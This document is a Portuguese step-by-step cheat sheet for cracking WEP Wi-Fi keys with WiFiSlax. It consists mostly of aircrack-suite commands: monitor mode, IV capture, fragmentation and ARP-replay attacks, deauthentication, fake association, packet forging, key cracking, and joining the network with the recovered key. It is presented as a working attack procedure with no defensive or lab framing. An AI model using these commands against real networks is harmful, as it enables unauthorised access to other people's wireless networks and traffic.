Quebrando Chave WEP (WIFISLAX) 

.:: ATAQUE DE FRAGMENTAÇÃO ::.
iwconfig ra0 rate 1M channel 3 mode monitor
airodump-ng --ivs -w chave -c 3 ra0
afrag ra0 00:AP 00:Cliente FF:FF:FF:FF:FF:FF 192.168.1.100 192.168.1.101 chave.xor
Resposta:
arpforge-ng chave.xor 1 00:00:AP OUTRO:CLIENTE:DA:REDE 192.168.1.100 192.168.1.101 lampi.cap
Resposta: DONE
aireplay-ng -2 ra0 -r lampi.cap
aircrack-ng -x -0 chave*.ivs
Obs: 250.000 IVS - Minimo para WEP

.:: AIROSCRIPT ::.
Abrir AiroScript
Wifislax > Herramientas Wireless > Airoscript

PLACA EM MODO MONITOR
*1) PLACA *9) Ativar Modo Monitor

SCANEAR
1)Scan (Scannear Rede)
*2) Escolher Cannal

ESCOLHA DO ALVO
*2)Select (Selecionar o Alvo)
*1)Cannal a ser atacado
*2) NO (Escolha esta opcao)

ATAQUE
3) Attack
****ORDEM FICA A SEU CRITERIO ESCOLHA SOMENTE 1***
1) Asociacion falsa => Automatico
5) Ataque de fragmentacion
6) Ataque Chopchop

Minimo 250.000 IVS = #Data

.:: AIREPLAY ::.
aireplay-ng --ipwsys -3 -b 00:Mac -h 00:Cliente -i rtap0 ra0
OU
aireplay-ng -0 1 -a 00:Server -c 00:Cliente ra0

airodump-ng -c 6 -w wep -1 ra0
-c = Canal a ser capturado
-w = Prefixo Dump
-i = Salvar os IVs capturados

aireplay-ng -1 0 -e betimlocal -a 00:Server -h 00:Cliente ra0
Respota: Association successful
-1 = Autenticação Fake
0 = Reascociar em segundo
-e = Nome da ESSID (REDE)
-a = Mac do Servidor
-h = Seu MAC

aireplay-ng -3 -b 00:Server -h 00:Cliente ra0
Resposta: Read XXX Packets
-3 = Standard ARP Request Replay
-b = MAC do Servidor
-h = Seu MAC

aircrack-ng -a 1 -0 -n 128
-a = Forçar ataque
1 = WEP Statica
-0 = Aplicar cor ao Aircrack
-n Specificar o tamanho da chave (128 ou 14-bit WEP)

.:: OUTROS ::.
Comandos
iwconfig -> Mostra placas do sistema.
iwlist ra0 scan -> Mostrar servidores
CONECTAR
Exemplo: Key Exemplo
iwconfig ra0 mode Managed key 72:6A:31:31:35
dhcp ra0
ifconfig ra0